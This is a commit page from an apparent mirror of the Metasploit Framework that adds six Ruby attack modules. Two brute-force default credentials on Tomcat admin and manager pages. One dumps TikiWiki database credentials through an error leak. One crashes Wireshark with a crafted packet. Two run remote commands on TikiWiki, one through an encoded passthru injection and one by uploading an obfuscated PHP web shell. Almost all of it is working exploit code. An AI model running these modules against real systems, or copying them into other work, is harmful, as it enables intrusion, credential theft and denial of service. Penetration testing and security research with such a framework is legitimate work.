dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

added modules from Matteo Cantoni. 

git-svn-id: file:///home/svn/framework3/trunk@6170 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
Mario Ceballos 2009-01-21 12:51:30 +00:00
parent 32868c4b0f
commit ff8323e6d2
6 changed files with 780 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

132
modules/auxiliary/admin/http/tomcat_administration.rb Normal file
View File

@ -0,0 +1,132 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::WMAPScanServer
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Tomcat Administration Tool default access',
'Version' => '$Revision: $',
'Description' => 'Detect Tomcat Administration Tool default access.',
'References' =>
[
['URL', 'http://tomcat.apache.org/'],
],
'Author' => 'Matteo Cantoni <goony[at]nothink.org>',
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(8180),
OptString.new('TOMCAT_USER', [ false, 'The username to authenticate as', '']),
OptString.new('TOMCAT_PASS', [ false, 'The password for the specified username', '']),
OptString.new('UserAgent', [ true, "The HTTP User-Agent sent in the request", 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)' ]),
], self.class)
end
def run_host(ip)
begin
res = send_request_raw({
'method' => 'GET',
'uri' => '/',
}, 25)
if (res and res.code == 200)
ver = ""
if res.body.match(/<title>Apache Tomcat\/(.*)<\/title>/)
ver = "Apache Tomcat/" + $1
end
user = datastore['TOMCAT_USER'].to_s
pass = datastore['TOMCAT_PASS'].to_s
if user.length == 0
default_usernames = ['admin','manager','role1','root','tomcat']
else
default_usernames = [user]
end
if pass.length == 0
default_passwords = ['admin','manager','role1','root','tomcat']
else
default_passwords = [pass]
end
default_usernames.each do |username|
default_passwords.each do |password|
res = send_request_raw({
'method' => 'GET',
'uri' => '/admin/',
}, 25)
if (res and res.code == 200)
if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/JSESSIONID=(.*);(.*)/i))
jsessionid = $1
post_data = "j_username=#{username}&j_password=#{password}"
res = send_request_cgi({
'uri' => '/admin/j_security_check',
'method' => 'POST',
'content-type' => 'application/x-www-form-urlencoded',
'cookie' => "JSESSIONID=#{jsessionid}",
'data' => post_data,
}, 25)
if (res.code == 302)
res = send_request_cgi({
'uri' => "/admin/",
'method' => 'GET',
'cookie' => "JSESSIONID=#{jsessionid}",
}, 25)
if (res.code == 302)
res = send_request_cgi({
'uri' => "/admin/frameset.jsp",
'method' => 'GET',
'cookie' => "JSESSIONID=#{jsessionid}",
}, 25)
if (res.code == 200)
print_status("http://#{target_host}:#{rport}/admin [#{res.headers['Server']}] [#{ver}] [Tomcat Server Administration] [#{username}/#{password}]")
end
# LogOut
res = send_request_cgi({
'uri' => '/admin/logOut.do',
'method' => 'GET',
'cookie' => "JSESSIONID=#{jsessionid}",
}, 25)
end
end
end
end
end
end
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end

95
modules/auxiliary/admin/http/tomcat_manager.rb Normal file
View File

@ -0,0 +1,95 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::WMAPScanServer
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Tomcat Application Manager default access',
'Version' => '$Revision: $',
'Description' => 'Detect Tomcat Web Application Manager default access.',
'References' =>
[
['URL', 'http://tomcat.apache.org/'],
],
'Author' => 'Matteo Cantoni <goony[at]nothink.org>',
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(8180),
OptString.new('TOMCAT_USER', [ false, 'The username to authenticate as', '']),
OptString.new('TOMCAT_PASS', [ false, 'The password for the specified username', '']),
OptString.new('UserAgent', [ true, "The HTTP User-Agent sent in the request", 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)' ]),
], self.class)
end
def run_host(ip)
begin
res = send_request_raw({
'method' => 'GET',
'uri' => '/',
}, 25)
if (res and res.code == 200)
user = datastore['TOMCAT_USER'].to_s
pass = datastore['TOMCAT_PASS'].to_s
if user.length == 0
default_usernames = ['admin','manager','role1','root','tomcat']
else
default_usernames = [user]
end
if pass.length == 0
default_passwords = ['admin','manager','role1','root','tomcat']
else
default_passwords = [pass]
end
default_usernames.each do |username|
default_passwords.each do |password|
user_pass = Rex::Text.encode_base64("#{username}" + ":" + "#{password}")
begin
res = send_request_cgi({
'uri' => "/manager/html",
'method' => 'GET',
'headers' =>
{
'Authorization' => "Basic #{user_pass}",
}
}, 25)
if (res.code == 200)
print_status("http://#{target_host}:#{rport}/manager/html [#{res.headers['Server']}] [Tomcat Application Manager] [#{username}/#{password}]")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end

120
modules/auxiliary/admin/tikiwiki/tikidblib.rb Normal file
View File

@ -0,0 +1,120 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'TikiWiki information disclosure',
'Description' => %q{
A vulnerability has been reported in Tikiwiki, which can be exploited by
a anonymous user to dump the MySQL user & passwd just by creating a mysql
error with the "sort_mode" var.
The vulnerability has been reported in Tikiwiki version 1.9.5.
},
'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
['OSVDB', '30172'],
['BID', '20858'],
['CVE', '2006-5702'],
['MIL', '2701'],
['URL', 'http://secunia.com/advisories/22678/'],
],
'DisclosureDate' => 'Nov 1 2006',
'Actions' =>
[
['Download']
],
'DefaultAction' => 'Download'
))
register_options(
[
OptString.new('URI', [true, "TikiWiki directory path", "/tikiwiki"]),
], self.class)
end
def run
print_status("Establishing a connection to the target...")
rpath = datastore['URI'] + "/tiki-lastchanges.php?days=1&offset=0&sort_mode="
res = send_request_raw({
'uri' => rpath,
'method' => 'GET',
'headers' =>
{
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
'Connection' => 'Close',
}
}, 25)
if (res and res.message == "OK")
print_status("Get informations about database...")
n = 0
c = 0
infos = res.body.split(/\r|\n/)
infos.each do |row|
if (c < 6)
if (row.match(/\["file"\]=>/))
c+=1
x = n + 1
y = infos[x].match(/string\(\d+\) "(.*)"/m)
print_status("Install path : #{y[1]}")
end
if (row.match(/\["databaseType"\]=>/))
c+=1
x = n + 1
y = infos[x].match(/string\(\d+\) "(.*)"/m)
print_status("DB type : #{y[1]}")
end
if (row.match(/\["database"\]=>/))
c+=1
x = n + 1
y = infos[x].match(/string\(\d+\) "(.*)"/m)
print_status("DB name : #{y[1]}")
end
if (row.match(/\["host"\]=>/))
c+=1
x = n + 1
y = infos[x].match(/string\(\d+\) "(.*)"/m)
print_status("DB host : #{y[1]}")
end
if (row.match(/\["user"\]=>/))
c+=1
x = n + 1
y = infos[x].match(/string\(\d+\) "(.*)"/m)
print_status("DB user : #{y[1]}")
end
if (row.match(/\["password"\]=>/))
c+=1
x = n + 1
y = infos[x].match(/string\(\d+\) "(.*)"/m)
print_status("DB password : #{y[1]}")
end
n+=1
end
end
if (c == 0)
print_status("Could not obtain informations about database.")
end
else
print_status("No response from the server.")
end
end
end

80
modules/auxiliary/dos/wireshark/chunked.rb Normal file
View File

@ -0,0 +1,80 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
require 'scruby'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Ip
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Wireshark chunked_encoding_dissector function DOS',
'Description' => %q{
Wireshark crash when dissecting an HTTP chunked response.
Versions affected: 0.99.5 (Bug 1394)
},
'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
[ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1394'],
],
'DisclosureDate' => 'February 22 2007'))
end
def run
print_status("Sending packet to #{rhost}")
connect_ip
pkt =(
Scruby::IP.new(
:dst => "#{rhost}",
:flags => 4,
:len => 20,
:ttl => 53,
:id => 0x2eac,
:chksum => 0xfc13
)/Scruby::TCP.new(
:sport => 80,
:dport => 1296,
:seq => 1,
:ack => 323,
:window => 6432,
:chksum => 0xfc13,
:flags => 18
)/"\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x33\x30\x32\x20\x46\x6f\x75\x6e\x64\x0d\x0a\x44\x61\x74\x65\x3a\x20\x54\x68\x75\x2c\x20\x32\x32\x20\x46\x65\x62\x20\x32\x30\x30\x37\x20\x32\x31\x3a\x35\x39\x3a\x30\x33\x20\x47\x4d\x54\x0d\x0a\x53\x65\x72\x76\x65\x72\x3a\x20\x41\x70\x61\x63\x68\x65\x2f\x31\x2e\x33\x2e\x33\x37\x20\x28\x55\x6e\x69\x78\x29\x20\x50\x48\x50\x2f\x34\x2e\x34\x2e\x34\x20\x6d\x6f\x64\x5f\x74\x68\x72\x6f\x74\x74\x6c\x65\x2f\x33\x2e\x31\x2e\x32\x20\x6d\x6f\x64\x5f\x70\x73\x6f\x66\x74\x5f\x74\x72\x61\x66\x66\x69\x63\x2f\x30\x2e\x31\x20\x6d\x6f\x64\x5f\x73\x73\x6c\x2f\x32\x2e\x38\x2e\x32\x38\x20\x4f\x70\x65\x6e\x53\x53\x4c\x2f\x30\x2e\x39\x2e\x36\x62\x20\x46\x72\x6f\x6e\x74\x50\x61\x67\x65\x2f\x35\x2e\x30\x2e\x32\x2e\x32\x36\x33\x35\x0d\x0a\x58\x2d\x50\x6f\x77\x65\x72\x65\x64\x2d\x42\x79\x3a\x20\x50\x48\x50\x2f\x34\x2e\x34\x2e\x34\x0d\x0a\x4c\x6f\x63\x61\x74\x69\x6f\x6e\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x2f\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x0d\x0a\x50\x33\x50\x3a\x20\x70\x6f\x6c\x69\x63\x79\x72\x65\x66\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x2f\x77\x33\x63\x2f\x70\x33\x70\x2e\x78\x6d\x6c\x22\x2c\x20\x43\x50\x3d\x22\x4e\x4f\x49\x20\x44\x53\x50\x20\x43\x4f\x52\x20\x4e\x49\x44\x20\x41\x44\x4d\x20\x44\x45\x56\x20\x50\x53\x41\x20\x4f\x55\x52\x20\x49\x4e\x44\x20\x55\x4e\x49\x20\x50\x55\x52\x20\x43\x4f\x4d\x20\x4e\x41\x56\x20\x49\x4e\x54\x20\x53\x54\x41\x22\x0d\x0a\x45\x78\x70\x69\x72\x65\x73\x3a\x20\x54\x68\x75\x2c\x20\x31\x39\x20\x4e\x6f\x76\x20\x31\x39\x38\x31\x20\x30\x38\x3a\x35\x32\x3a\x30\x30\x20\x47\x4d\x54\x0d\x0a\x50\x72\x61\x67\x6d\x61\x3a\x20\x6e\x6f\x2d\x63\x61\x63\x68\x65\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x44\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x20\x61\x74\x74\x61\x63\x68\x6d\x65\x6e\x74\x3b\x20\x66\x69\x6c\x65\x6e\x61\x6d\x65\x3d\x53\x74\x61\x74\x43\x6f\x75\x6e\x74\x65\x72\x2d\x4c\x6f\x67\x2d\x32\x32\x38\x37\x35\x39\x32\x2e\x63\x73\x76\x0d\x0a\x53\x65\x74\x2d\x43\x6f\x6f\x6b\x69\x65\x3a\x20\x50\x48\x50\x53\x45\x53\x53\x49\x44\x3d\x64\x37\x35\x65\x64\x39\x37\x36\x66\x30\x30\x39\x64\x61\x31\x31\x38\x65\x62\x36\x31\x34\x62\x39\x38\x66\x64\x35\x62\x39\x31\x36\x25\x33\x42\x2b\x70\x61\x74\x68\x25\x33\x44\x25\x32\x46\x0d\x0a\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x3a\x20\x74\x69\x6d\x65\x6f\x75\x74\x3d\x31\x35\x2c\x20\x6d\x61\x78\x3d\x31\x30\x30\x0d\x0a\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x20\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x0d\x0a\x54\x72\x61\x6e\x73\x66\x65\x72\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x20\x63\x68\x75\x6e\x6b\x65\x64\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6f\x63\x74\x65\x74\x2d\x73\x74\x72\x65\x61\x6d\x0d\x0a\x0d\x0a\x30\x0d\x0a\x0d\x0a").to_net
ip_write(pkt)
disconnect_ip
end
end
=begin
HTTP/1.1 302 Found
Date: Thu, 22 Feb 2007 21:59:03 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4 mod_throttle/3.1.2 mod_psoft_traffic/0.1 mod_ssl/2.8.28 OpenSSL/0.9.6b FrontPage/5.0.2.2635
X-Powered-By: PHP/4.4.4
Location: http://127.0.0.1/index.html
P3P: policyref="http://127.0.0.1/w3c/p3p.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Disposition: attachment; filename=StatCounter-Log-2287592.csv
Set-Cookie: PHPSESSID=d75ed976f009da118eb614b98fd5b916%3B+path%3D%2F
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/octet-stream
0
=end

149
modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb Normal file
View File

@ -0,0 +1,149 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'TikiWiki tiki-graph_formula Remote Command Execution',
'Description' => %q{
TikiWiki (<= 1.9.8) contains a flaw that may allow a remote attacker to execute arbitrary commands.
The issue is due to 'tiki-graph_formula.php' script not properly sanitizing user input
supplied to the f variable, which may allow a remote attacker to execute arbitrary PHP
commands resulting in a loss of integrity.
},
'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
['OSVDB', '40478'],
['BID', '26006'],
['CVE', '2007-5423'],
['MIL', '4525'],
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 1024,
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [[ 'Automatic', { }]],
'DisclosureDate' => 'Oct 10 2007',
'DefaultTarget' => 0))
register_options(
[
OptString.new('URI', [true, "TikiWiki directory path", "/tikiwiki"]),
], self.class)
end
def check
res = send_request_raw({
'uri' => datastore['URI'] + "/tiki-index.php",
'method' => 'GET',
'headers' =>
{
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
'Connection' => 'Close',
}
}, 25)
if (res and res.message == "OK" and res.body.match(/TikiWiki v1.|TikiWiki 1./))
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
url_db_local = datastore['URI'] +
"/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.passthru(" +
"chr(101).chr(99).chr(104).chr(111).chr(32)." + "chr(89).chr(89).chr(89)." + "chr(59)." +
"chr(99).chr(97).chr(116).chr(32).chr(100).chr(98).chr(47).chr(108).chr(111).chr(99).chr(97).chr(108).chr(46).chr(112).chr(104).chr(112)." +
"chr(59)." + "chr(101).chr(99).chr(104).chr(111).chr(32)." + "chr(89).chr(89).chr(89)" +
").die()&t=png&title="
print_status("Sending request...")
res = send_request_raw({
'uri' => url_db_local,
'method' => 'GET',
'headers' =>
{
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
'Connection' => 'Close',
}
}, 25)
if (res and res.message == "OK" and res.body)
print_status("The server returned : #{res.code} #{res.message}")
print_status("Server version : #{res.headers['Server']}")
db_tiki = res.body.match(/db_tiki='(.*?)';/m)
dbversion = res.body.match(/dbversion_tiki='(.*?)';/m)
host_tiki = res.body.match(/host_tiki='(.*?)';/m)
user_tiki = res.body.match(/user_tiki='(.*?)';/m)
pass_tiki = res.body.match(/pass_tiki='(.*?)';/m)
dbs_tiki = res.body.match(/dbs_tiki='(.*?)';/m)
print_status("TikiWiki database informations : \n")
print("db_tiki : " + db_tiki[1] + "\n")
print("dbversion : " + dbversion[1] + "\n")
print("host_tiki : " + host_tiki[1] + "\n")
print("user_tiki : " + user_tiki[1] + "\n")
print("pass_tiki : " + pass_tiki[1] + "\n")
print("dbs_tiki : " + dbs_tiki[1] + "\n\n")
else
print_status("No response from the server")
end
command = Rex::Text.uri_encode(payload.encoded)
encoded = payload.encoded.unpack('C*').map { |c| "chr(#{c})"}.join('.') + ".chr(32)"
url_cmd = datastore['URI'] + "/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.passthru(" +
"chr(101).chr(99).chr(104).chr(111).chr(32)." + "chr(89).chr(89).chr(89)." + "chr(59)." + encoded + ".chr(59)." +
"chr(101).chr(99).chr(104).chr(111).chr(32)." + "chr(89).chr(89).chr(89)" + ").die()&t=png&title="
print_status("Sending request...")
res = send_request_raw({
'uri' => url_cmd,
'method' => 'GET',
'headers' =>
{
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
'Connection' => 'Close',
}
}, 25)
if (res and res.message == "OK" and res.body)
print_status("The server returned : #{res.code} #{res.message}")
cmd_output = res.body.match(/YYY\n(.*)\nYYY/m)
if (cmd_output)
print_status("Command output from the server :")
print("\n" + cmd_output[1] + "\n\n")
else
print_status("This server may not be vulnerable")
end
else
print_status("No response from the server")
end
end
end

204
modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb Normal file
View File

@ -0,0 +1,204 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'TikiWiki jhot Remote Command Execution',
'Description' => %q{
TikiWiki contains a flaw that may allow a malicious user to execute
arbitrary PHP code. The issue is triggered due to the jhot.php script
not correctly verifying uploaded files. It is possible that the flaw
may allow arbitrary PHP code execution by uploading a malicious PHP
script resulting in a loss of integrity.
The vulnerability has been reported in Tikiwiki version 1.9.4.
},
'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
['OSVDB', '28456'],
['BID', '19819'],
['CVE', '2006-4602'],
['MIL', '2288'],
['URL', 'http://secunia.com/advisories/21733/'],
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 1024,
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [[ 'Automatic', { }]],
'DisclosureDate' => 'Sep 2 2006',
'DefaultTarget' => 0))
register_options(
[
OptString.new('URI', [true, "TikiWiki directory path", "/tikiwiki/"]),
], self.class)
end
def check
res = send_request_raw({
'uri' => datastore['URI'] + "/tiki-index.php",
'method' => 'GET',
'headers' =>
{
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
'Connection' => 'Close',
}
}, 25)
if (res and res.message == "OK" and res.body.match(/TikiWiki 1.9.4/))
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
create_temp_file()
command = payload.encoded
exe_command(command)
remove_temp_file()
end
def create_temp_file
url_jhot = datastore['URI'] + "/jhot.php"
scode =
"\x0d\x0a\x3c\x3f\x70\x68\x70\x0d\x0a\x2f\x2f\x20\x24\x48\x65\x61" +
"\x64\x65\x72\x3a\x20\x2f\x63\x76\x73\x72\x6f\x6f\x74\x2f\x74\x69" +
"\x6b\x69\x77\x69\x6b\x69\x2f\x74\x69\x6b\x69\x2f\x74\x69\x6b\x69" +
"\x2d\x63\x6f\x6e\x66\x69\x67\x2e\x70\x68\x70\x2c\x76\x20\x31\x2e" +
"\x38\x2e\x32\x2e\x35\x20\x32\x30\x30\x35\x2f\x30\x38\x2f\x32\x32" +
"\x20\x30\x38\x3a\x30\x30\x3a\x35\x33\x20\x74\x65\x6c\x65\x6e\x69" +
"\x65\x6b\x6f\x20\x45\x78\x70\x20\x24\x0d\x0a\x0d\x0a\x2f\x2f\x20" +
"\x43\x6f\x70\x79\x72\x69\x67\x68\x74\x20\x28\x63\x29\x20\x32\x30" +
"\x30\x32\x2d\x32\x30\x30\x35\x2c\x20\x4c\x75\x69\x73\x20\x41\x72" +
"\x67\x65\x72\x69\x63\x68\x2c\x20\x47\x61\x72\x6c\x61\x6e\x64\x20" +
"\x46\x6f\x73\x74\x65\x72\x2c\x20\x45\x64\x75\x61\x72\x64\x6f\x20" +
"\x50\x6f\x6c\x69\x64\x6f\x72\x2c\x20\x65\x74\x2e\x20\x61\x6c\x2e" +
"\x0d\x0a\x2f\x2f\x20\x41\x6c\x6c\x20\x52\x69\x67\x68\x74\x73\x20" +
"\x52\x65\x73\x65\x72\x76\x65\x64\x2e\x20\x53\x65\x65\x20\x63\x6f" +
"\x70\x79\x72\x69\x67\x68\x74\x2e\x74\x78\x74\x20\x66\x6f\x72\x20" +
"\x64\x65\x74\x61\x69\x6c\x73\x20\x61\x6e\x64\x20\x61\x20\x63\x6f" +
"\x6d\x70\x6c\x65\x74\x65\x20\x6c\x69\x73\x74\x20\x6f\x66\x20\x61" +
"\x75\x74\x68\x6f\x72\x73\x2e\x0d\x0a\x2f\x2f\x20\x4c\x69\x63\x65" +
"\x6e\x73\x65\x64\x20\x75\x6e\x64\x65\x72\x20\x74\x68\x65\x20\x47" +
"\x4e\x55\x20\x4c\x45\x53\x53\x45\x52\x20\x47\x45\x4e\x45\x52\x41" +
"\x4c\x20\x50\x55\x42\x4c\x49\x43\x20\x4c\x49\x43\x45\x4e\x53\x45" +
"\x2e\x20\x53\x65\x65\x20\x6c\x69\x63\x65\x6e\x73\x65\x2e\x74\x78" +
"\x74\x20\x66\x6f\x72\x20\x64\x65\x74\x61\x69\x6c\x73\x2e\x0d\x0a" +
"\x0d\x0a\x23\x20\x24\x48\x65\x61\x64\x65\x72\x3a\x20\x2f\x63\x76" +
"\x73\x72\x6f\x6f\x74\x2f\x74\x69\x6b\x69\x77\x69\x6b\x69\x2f\x74" +
"\x69\x6b\x69\x2f\x62\x61\x6e\x6e\x65\x72\x5f\x69\x6d\x61\x67\x65" +
"\x2e\x70\x68\x70\x2c\x76\x20\x31\x2e\x38\x2e\x32\x2e\x35\x20\x32" +
"\x30\x30\x35\x2f\x30\x38\x2f\x32\x32\x20\x30\x38\x3a\x30\x30\x3a" +
"\x35\x33\x20\x74\x65\x6c\x65\x6e\x69\x65\x6b\x6f\x20\x45\x78\x70" +
"\x20\x24\x0d\x0a\x0d\x0a\x2f\x2f\x20\x74\x69\x6b\x69\x77\x69\x6b" +
"\x69\x20\x63\x6f\x6e\x66\x69\x67\x75\x72\x61\x74\x69\x6f\x6e\x20" +
"\x73\x63\x72\x69\x70\x74\x0d\x0a\x0d\x0a\x65\x76\x61\x6c\x28\x62" +
"\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x22\x5a\x58" +
"\x4a\x79\x62\x33\x4a\x66\x63\x6d\x56\x77\x62\x33\x4a\x30\x61\x57" +
"\x35\x6e\x4b\x44\x41\x70\x4f\x33\x4e\x6c\x64\x46\x39\x30\x61\x57" +
"\x31\x6c\x58\x32\x78\x70\x62\x57\x6c\x30\x4b\x44\x41\x70\x4f\x32" +
"\x56\x6a\x61\x47\x38\x67\x49\x6d\x31\x35\x58\x32\x52\x6c\x62\x47" +
"\x6c\x74\x49\x6a\x74\x77\x59\x58\x4e\x7a\x64\x47\x68\x79\x64\x53" +
"\x67\x6b\x58\x31\x4e\x46\x55\x6c\x5a\x46\x55\x6c\x73\x69\x53\x46" +
"\x52\x55\x55\x46\x39\x44\x54\x45\x6c\x46\x54\x6c\x52\x66\x53\x56" +
"\x41\x69\x58\x53\x6b\x37\x22\x29\x29\x3b\x0d\x0a\x3f\x3e\x0d\x0a"
data =
"-----------------------------7d529a1d23092a\r\n" +
"Content-Disposition: form-data; name=\"filepath\"; filename=\"tiki-config.php\";\r\n\r\n" +
scode +
"\r\n" +
"-----------------------------7d529a1d23092a--\r\n"
res = send_request_cgi({
'uri' => url_jhot,
'method' => 'POST',
'data' => "#{data}",
'headers' =>
{
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
'Content-Type' => 'multipart/form-data; boundary=---------------------------7d529a1d23092a',
'Connection' => 'Close',
}
}, 25)
if (res and res.message == "OK")
print_status("Successfully created temporary file.")
else
print_status("Error creating temporary file.")
end
end
def exe_command(cmd)
url_config = datastore['URI'] + "/img/wiki/tiki-config.php"
res = send_request_raw({
'uri' => url_config,
'method' => 'GET',
'headers' =>
{
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
'CLIENT-IP' => "#{cmd};",
'Connection' => 'Close',
}
}, 25)
if (res and res.message == "OK" and res.body.match(/my_delim/m))
print_status("The server returned : #{res.code} #{res.message} (#{res.headers['Server']})")
cmd_output = res.body.match(/my_delim(.*)/m)
if (cmd_output)
print_status("Command output from the server :")
print("\n" + cmd_output[1] + "\n")
else
print_status("This server may not be vulnerable")
end
else
print_status("No response from the server")
end
end
def remove_temp_file
url_config = datastore['URI'] + "/img/wiki/tiki-config.php"
res = send_request_raw({
'uri' => url_config,
'method' => 'GET',
'headers' =>
{
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
'CLIENT-IP' => 'rm -f tiki-config.php',
'Connection' => 'Close',
}
}, 25)
if (res and res.message == "OK")
print_status("Successfully remove temporary file.")
else
print_status("Error removing temporary file.")
end
end
end